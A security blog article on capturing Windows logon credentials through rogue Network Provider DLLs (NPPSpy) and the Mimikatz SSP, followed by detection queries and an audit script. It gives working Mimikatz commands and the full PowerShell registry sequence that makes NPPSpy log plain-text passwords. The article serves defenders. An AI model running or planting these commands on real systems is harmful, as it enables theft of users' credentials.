Network Provider - Sneaky alternative to extract credentials

by Michael Schneider
on February 17, 2022
time to read: 8 minutes

Keypoints

Windows attacks with Network Provider

  • Attacks against LSA can be made harder with Credential Guard and LSA Protection
  • Security Support Providers get access to credentials via LSA
  • Network Providers also get credentials access on logins and password changes
  • NPPSpy is a Network Provider/Credential Manager DLL that extracts credentials and stores them in plain text
  • Network Providers are an alternative to LSA attacks that is less observed and easier to execute

The security functions Additional LSA Protection and Credential Guard make it more difficult to extract credentials from memory. With Credential Guard, the passwords of domain users, for example, are encrypted, and there is no known direct attack against the virtualisation of the Local Security Authority Subsystem Service (LSASS) process. With LSA Protection, only Microsoft-signed security modules are allowed to be loaded into the LSASS process.

However, techniques exist to circumvent both security features. By manipulating the core system, Virtual Secure Mode (VSM) and thus Credential Guard can be disabled, and by loading a signed kernel driver, LSA Protection can be deactivated at runtime. These techniques harm the integrity of the system and leave obvious traces that can be detected. Are there other techniques to get credentials that have lower requirements and less impact on a system's integrity?

Windows Authentication Provider

User authentication is a core function of the operating system. The Windows Authentication Architecture contains multiple components that have access to credentials. When users authenticate themselves to the operating system, these components can further process the credentials. An often-used procedure is the caching of credentials in order to authenticate against other systems without users having to enter their usernames and passwords again.

Security Support Provider

The Security Support Providers (SSP) include Kerberos, NTLM (MSV1), TLS/SSL (Schannel) and Digest (WDigest). The Security Support Provider Interface (SSPI) makes it easy to load additional security modules: the registry value Security Packages must be extended by the name of the SSP's DLL. The value is located under the path HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

The LSA Protection function can be used to restrict loading to SSPs signed by Microsoft – otherwise any DLL can be loaded into the LSASS process. For example, Mimikatz provides with mimilib.dll an SSP that can be loaded with administrative rights:

mimikatz(commandline)# privilege::debug
Privilege '20' OK

mimikatz(commandline)# misc::memssp
Injected =)

Alternatively, if Mimikatz itself should not be executed on the target system, the file mimilib.dll can be copied into the directory %WINDIR%\system32 and the Security Packages registry value extended accordingly. After the Mimikatz SSP has been loaded, credentials are written to mimilsa.log after each successful login.

Attacks against LSA and the use of SSPs have been practised for years, so most of the techniques are known, countermeasures are available, and various endpoint solutions can detect these attack techniques.

Network Provider

A network provider is a DLL that provides support for a specific network protocol. It uses the Network Provider API to communicate with the operating system. A network provider can also be a credential manager; credential managers receive a notification when a user logs in or a password is changed.

Winlogon provides the graphical user interface (GUI) and the authentication functionality. Winlogon communicates with mpnotify via an RPC channel and passes on usernames and passwords. The mpnotify tool then distributes this information to the registered credential managers. These can be loaded via the registry in the same way as SSPs: the registry value ProviderOrder under the path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order lists all network providers. A credential manager receives the credentials through its NPLogonNotify function.

NPPSpy

The security researcher Grzegorz Tworek published an implementation of the NPLogonNotify function, NPPSpy, two years ago in July 2020. NPPSpy stores the username and password of a login in plain text in a log file.

Use

The NPPSpy DLL is copied into the folder %WINDIR%\system32 with administrative rights. Afterwards, some registry keys must be set and NPPSpy must be registered as a network provider. This can be done with the following PowerShell commands:

$NetworkProviderName = "NPPSpy"

# Register the DLL as a service with a NetworkProvider subkey; Class 2 marks it as a credential manager.
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName"
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider"
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll"

# Append the new provider to the comma-separated ProviderOrder list so mpnotify loads it.
$NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder
$NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName"
Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder

After that, NPPSpy is active and saves the credentials in the file C:\NPPSpy.txt every time someone logs in.

Countermeasures

The attack requires administrative rights because a DLL file is copied into the Windows system directory and registry entries are created or adjusted. If attackers obtain administrative rights, the attack cannot be prevented directly. Unlike the LSASS process, there are no hardening measures for network providers. The NPPSpy DLL itself may be detected by an endpoint solution.

To detect the attack, the registry value HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder should be monitored for changes. Furthermore, services that are registered as network providers can be monitored. The query suggested in the article Network Logon Provider Registry Modification can be used for Elasticsearch, for example:

registry where registry.data.strings != null and
  registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath" and
  /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */
  not ( user.id : "S-1-5-18" and
        registry.data.strings in ("%SystemRoot%\\System32\\ntlanman.dll",
                                  "%SystemRoot%\\System32\\drprov.dll",
                                  "%SystemRoot%\\System32\\davclnt.dll") )

Grzegorz Tworek's repository also contains the PowerShell script Get-NetworkProviders.ps1, which lists all registered network providers of a system. It can be used to analyse the network providers and shows additional information about the respective DLL file, including whether it is signed and by whom.

PS C:\> .\Get-NetworkProviders.ps1

Name        : RDPNP
DllPath     : C:\Windows\System32\drprov.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft Remote Desktop Session Host Server Network Provider

Name        : LanmanWorkstation
DllPath     : C:\Windows\System32\ntlanman.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft® Lan Manager

Name        : webclient
DllPath     : C:\Windows\System32\davclnt.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.546 (WinBuild.160101.0800)
Description : Web DAV Client DLL

Name        : NPPSpy
DllPath     : C:\Windows\System32\NPPSPY.dll
Signer      :
Version     :
Description :

The network provider NPPSpy is clearly suspicious in this case. Attackers can, of course, choose any name, but the missing signature is a suspicious indicator.
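As an added example of the audit described above (not code from the article or from Grzegorz Tworek's repository), the following PowerShell script walks the ProviderOrder list, resolves each provider's ProviderPath and Class, and flags entries whose DLL is missing, unsigned, or not signed by Microsoft. It assumes the Windows 10 default providers shown in the output above (RDPNP, LanmanWorkstation, webclient); adjust the list for other builds.

```powershell
# Added example, not part of the original article. Run as administrator.
$orderKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order'
$order = (Get-ItemProperty -Path $orderKey -Name ProviderOrder).ProviderOrder

# Default providers on a Windows 10 client (assumption based on the output above).
$knownDefaults = @('RDPNP', 'LanmanWorkstation', 'webclient')

foreach ($name in ($order -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })) {
    $npKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$name\NetworkProvider"
    $finding = [ordered]@{ Name = $name; Class = $null; DllPath = $null; Signer = $null; Status = $null }

    if (-not (Test-Path -Path $npKey)) {
        $finding.Status = 'SUSPICIOUS: listed in ProviderOrder but has no NetworkProvider key'
        [pscustomobject]$finding
        continue
    }

    $np = Get-ItemProperty -Path $npKey -ErrorAction SilentlyContinue
    # Class 2 marks a credential manager, i.e. a provider that receives logon notifications.
    $finding.Class = $np.Class
    # ProviderPath is REG_EXPAND_SZ; expand it again in case the value was stored as plain REG_SZ.
    $dll = [Environment]::ExpandEnvironmentVariables([string]$np.ProviderPath)
    $finding.DllPath = $dll

    if (-not $dll -or -not (Test-Path -LiteralPath $dll)) {
        $finding.Status = 'SUSPICIOUS: ProviderPath missing or DLL not on disk'
    } else {
        $sig = Get-AuthenticodeSignature -FilePath $dll
        $finding.Signer = $sig.SignerCertificate.Subject
        if ($sig.Status -ne 'Valid') {
            # Unsigned or tampered DLL: the NPPSpy case from the output above lands here.
            $finding.Status = "SUSPICIOUS: signature status $($sig.Status)"
        } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
            $finding.Status = 'REVIEW: valid signature, but not issued to Microsoft'
        } elseif ($knownDefaults -notcontains $name) {
            $finding.Status = 'REVIEW: Microsoft-signed, but not a default provider'
        } else {
            $finding.Status = 'OK'
        }
    }
    [pscustomobject]$finding
}
```

Scheduling this script and diffing its output against a known-good baseline complements the registry-change query above, since it also catches providers registered before monitoring was switched on.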

Conclusion

Attacks against the LSA are widespread, and consequently some hardening measures exist to make such attacks more difficult. The complexity and requirements of LSA attacks are constantly increasing. In addition, the extraction of LSA memory is detected and partially blocked by many endpoint solutions. In contrast, attacks using network providers are easy to implement and much less monitored. Accordingly, defenders should implement suitable detection use cases for network providers. For attackers, network providers remain an alternative way to extract credentials. In contrast to an LSA dump, however, attackers do not obtain credentials directly, but must access the log file again at a later time and hope that someone has logged into the system in the meantime.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he has focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)
